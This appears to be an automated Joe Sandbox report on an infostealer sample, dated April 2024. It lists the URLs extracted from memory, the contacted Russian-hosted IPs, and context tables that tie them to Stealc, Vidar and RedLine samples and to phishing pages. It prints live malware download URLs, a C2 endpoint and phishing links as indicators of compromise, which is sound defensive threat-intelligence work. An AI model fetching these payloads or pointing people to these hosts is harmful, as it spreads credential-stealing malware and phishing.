http://dejavu.sourceforge.net/wiki/index.php/License	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	false		high
https://scripts.sil.org/OFLThis	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&z	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&v	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.iolo.com/company/legal/eula/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabS	MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u42w.0.exe, 00000001.00000003.1767072510.00000000231BD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com	g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	false		high
https://dc.services.visualstudio.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.203/tiktok.exe00	u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.codeplex.com/prism	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://taskscheduler.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp	false		high
http://185.172.128.76/15f649199f40275b/softokn3.dllI	u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	false		high
http://compositewpf.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0D	g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	false		high
https://rt.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://185.172.128.203/tiktok.exeq	u42w.0.exe, 00000001.00000002.2112134672.00000000292B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	u42w.0.exe, 00000001.00000002.2117404121.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/JamesNK/Newtonsoft.Json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.vmware.com/0/	run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.phpt	u42w.0.exe, 00000001.00000002.2112134672.00000000292B1000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll9	u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.172.128.203	unknown	Russian Federation	50916	NADYMSS-ASRU	false
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true
185.172.128.76	unknown	Russian Federation	50916	NADYMSS-ASRU	true
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431471
Start date and time:	2024-04-25 09:03:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	g77dRQ1Csm.exe renamed because original name is a hash value
Original Sample Name:	41de8e3e7412b6e97b60fdbfdd24b0ba.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@27/66@4/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 113 Number of non-executed functions: 250
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.126.29.8, 40.126.29.15, 40.126.29.5, 20.190.157.11, 40.126.29.9, 40.126.29.12, 40.126.29.14, 40.126.29.7, 72.21.81.240, 13.85.23.86, 192.229.211.108, 20.3.187.198, 20.189.173.22, 20.166.126.56, 184.31.62.93, 20.9.155.145
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, gig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:04:19	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
09:04:18	API Interceptor	2x Sleep call for process: WerFault.exe modified
09:04:34	API Interceptor	152326x Sleep call for process: MSBuild.exe modified
09:04:35	API Interceptor	830190x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
09:04:41	API Interceptor	2x Sleep call for process: cmd.exe modified
09:05:07	API Interceptor	452522x Sleep call for process: FCBAECGIEB.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.90	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
185.172.128.228	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=seven
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=two
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	http://rfpteams.ksplastlc.net	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://app.milanote.com/1RZbnl1zfBXuaf?p=r2B66sphbV4	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://decktop.us/gORiyf	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	https://cos-aliyun8789.towqzg.cn/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://shining-melodic-magnesium.glitch.me/rvicendDev.html	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://univ-paris13-4.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://univ-paris13-3.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://c26ruwywyksyku.z13.web.core.windows.net/Win08ShDMeEr0887/index.html?phone=%201-844-693-8046	Get hash	malicious	TechSupportScam	Browse	192.229.211.108
	https://univ-paris13.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://ernestjcrist.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2020596-12595&13813e8=https://femininplurielles.com	Get hash	malicious	TechSupportScam	Browse	192.229.211.108
svc.iolo.com	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	5SLBlv4aUS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	20.157.87.45
note.padd.cn.com	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QoAgJHA78f.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	H6ohQMZygb.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	176.97.76.106
iolo0.b-cdn.net	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.251
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.246
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	6wBnmIAQNW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.246
	zLwT7vCojz.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.99
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.244
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.97
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.243
	40jnt39QJ2.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.93.1.251

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	185.172.128.19
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	tt1pR7pJbF.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	IvxnEUAtC3.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
NADYMSS-ASRU	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse	185.172.128.203
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	185.172.128.19
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.59
	tt1pR7pJbF.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	IvxnEUAtC3.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
MICROSOFT-CORP-MSN-AS-BLOCKUS	http://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://pub-839300a9c6054ed7b1c425122a9dd984.r2.dev/doc.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://www.bing.com/////////////////////ck/a?!&&p=0533e94aab0b2a6eJmltdHM9MTcxMzQ4NDgwMCZpZ3VpZD0xNDE4NDZmNi1iZWY1LTY4NjUtMjQ0YS01MjkwYmYwZTY5ODQmaW5zaWQ9NTIyMA&ptn=3&ver=2&hsh=3&fclid=141846f6-bef5-6865-244a-5290bf0e6984&u=a1aHR0cHM6Ly9reDRrc3IuYXJ0aWNsZXdyaXRpbmdnZW5lcmF0b3IueHl6Lw#vds2aa29aYmRldmluc0B3ZS13b3JsZHdpZGUuY29t	Get hash	malicious	HTMLPhisher	Browse	52.96.190.194
	http://electricalsworksflorida.com/j6u	Get hash	malicious	HTMLPhisher	Browse	13.107.213.69
	https://gamma.app/docs/Shared-Document-9j9g6z8iqo1w0uu	Get hash	malicious	HTMLPhisher	Browse	13.107.246.69
	https://calderamanufacturing-my.sharepoint.com/:b:/g/personal/rcuthbertson_summitsteelinc_com/EXRx7fLGAqJIpy0dNft_VNoBmqNR3C5b2tYm8DhDa2jZuQ?e=L3dfvE	Get hash	malicious	Unknown	Browse	52.104.109.39
	https://mewarpolytex123-my.sharepoint.com/:b:/g/personal/vikas_neema_mewarpolytex_com/EcuKXONpgCBJueK6mARkdzgBWKWYEsPlZVnvj9b8YAr_dA?e=GZh1gs	Get hash	malicious	Unknown	Browse	52.105.237.41
	https://cloudflare-ipfs.com/ipfs/bafkreiffz46tyqvifmyhjcdbynucd4duurmznmxaorlfjuwzovmtocshje	Get hash	malicious	HTMLPhisher	Browse	13.107.213.69
